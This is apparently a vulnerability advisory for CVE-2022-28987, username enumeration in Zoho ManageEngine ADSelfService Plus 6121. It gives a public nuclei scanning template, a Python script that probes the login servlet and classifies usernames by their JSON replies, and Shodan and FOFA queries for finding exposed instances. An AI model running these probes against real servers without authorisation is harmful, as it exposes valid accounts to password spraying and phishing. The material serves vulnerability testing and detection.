CVE-2022-28987: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

Date: 2026-02-03 | Affected software: Zoho ManageEngine ADSelfService Plus 6121 | PoC: public

Vulnerability description

Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987, CWE-203). The Forgot Password functionality responds differently for existing and non-existing users, so an unauthenticated attacker can confirm which usernames are valid before mounting password spraying or targeted phishing. The nuclei template below probes the "/ServletAPI/accounts/login" servlet rather than the Forgot Password page: it posts a deliberately bogus loginName and then the built-in "Guest" account, and reports a hit when either JSON response carries an account-specific eSTATUS ("Permission Denied" or "Your account has been disabled"). The template is marked "verified: false", and because its two matchers are OR-ed it does not compare the Guest response against the bogus-name baseline, so confirm any hit manually. Fixed in version 6202.

PoC code [public]

id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.166
    epss-percentile: 0.9477
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022033f71a664930288497e65062e4195548662e99891b6b860b3afda94f26033517022100db4f66ca5169358ff2a8c40748e4fd48522d87fc08d2cc42d9a5862a52a85398:922c64590222798bb761d5b6d8e72950
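The following Python script is an added example, not part of the nuclei template above or of the passtheticket research it references. It reimplements the same oracle (POST loginName= to /ServletAPI/accounts/login, look at the eSTATUS field of the JSON reply) but adds the check the template lacks: every candidate is compared against the reply for a known-nonexistent name, so a server that answers every name identically (patched, or a build that never exposed the oracle) is reported as "no-oracle" instead of silently producing nothing. The transport is pluggable; the FAKE_RESPONSES table and its eSTATUS strings for unknown names are constructed for offline use and are assumptions, as are the hostname and candidate usernames.

```python
"""Username-enumeration oracle for the ADSelfService Plus login servlet (CVE-2022-28987).

Added example, not the project's or the template author's code. Endpoint, parameter
and the two "account exists" eSTATUS markers are taken from the nuclei template; the
offline responses below are constructed for testing and are not captured from a server.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Tuple

LOGIN_PATH = "/ServletAPI/accounts/login"
# eSTATUS values the template treats as proof that the account exists.
EXISTS_MARKERS = ("Permission Denied", "Your account has been disabled")

Response = Tuple[int, str, bytes]          # (status code, Content-Type, body)
Transport = Callable[[str, str], Response]  # (base_url, login_name) -> Response


def probe_status(resp: Response) -> str:
    """Return the eSTATUS field of a 200/JSON reply, or "" when there is none."""
    status, ctype, body = resp
    if status != 200 or "application/json" not in ctype.lower():
        return ""
    try:
        data = json.loads(body.decode("utf-8", "replace"))
    except ValueError:
        return ""
    return str(data.get("eSTATUS", "")) if isinstance(data, dict) else ""


def classify(candidate_resp: Response, baseline_resp: Response) -> str:
    """Classify one candidate against the reply for a known-nonexistent name.

    'exists'     candidate reply carries an account-specific eSTATUS marker
    'no-oracle'  candidate and baseline are indistinguishable (patched build, or
                 the name is simply unknown to the server)
    'differs'    replies differ but not by a known marker; inspect by hand
    """
    cand = probe_status(candidate_resp)
    base = probe_status(baseline_resp)
    if any(marker in cand for marker in EXISTS_MARKERS):
        return "exists"
    if cand == base:
        return "no-oracle"
    return "differs"


def http_transport(base_url: str, login_name: str) -> Response:
    """Live transport: the same request the template sends (network access assumed)."""
    data = urllib.parse.urlencode({"loginName": login_name}).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + LOGIN_PATH, data=data, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, r.headers.get("Content-Type", ""), r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Content-Type", ""), e.read()


def enumerate_users(base_url: str, candidates: Iterable[str],
                    transport: Transport = http_transport,
                    baseline_name: str = "asdfnonexistent") -> Dict[str, str]:
    """Fetch the baseline once, then classify every candidate against it."""
    baseline = transport(base_url, baseline_name)
    return {name: classify(transport(base_url, name), baseline) for name in candidates}


# Constructed offline responses (assumption: not captured from a real instance). The
# value returned for an unknown name is a placeholder; a real server's wording differs.
FAKE_RESPONSES: Dict[str, Response] = {
    "asdfnonexistent": (200, "application/json;charset=UTF-8",
                        b'{"eSTATUS":"constructed-unknown-name-reply"}'),
    "Guest": (200, "application/json;charset=UTF-8",
              b'{"eSTATUS":"Permission Denied"}'),
    "svc_backup": (200, "application/json;charset=UTF-8",
                   b'{"eSTATUS":"Your account has been disabled"}'),
}


def fake_transport(base_url: str, login_name: str) -> Response:
    """Offline transport: unknown names get the same reply as the baseline name."""
    return FAKE_RESPONSES.get(login_name, FAKE_RESPONSES["asdfnonexistent"])


if __name__ == "__main__":
    # Hostname and candidate list are assumptions for illustration.
    results = enumerate_users("https://adssp.example.internal:8888",
                              ["Guest", "svc_backup", "nobody2"], transport=fake_transport)
    for name, verdict in results.items():
        print(f"{name:12s} {verdict}")
```

Swap fake_transport for the default http_transport to run it against a lab instance; keep the request rate low, since a burst of POSTs to /ServletAPI/accounts/login with varying loginName values from one source is exactly what a detection rule for this CVE should flag.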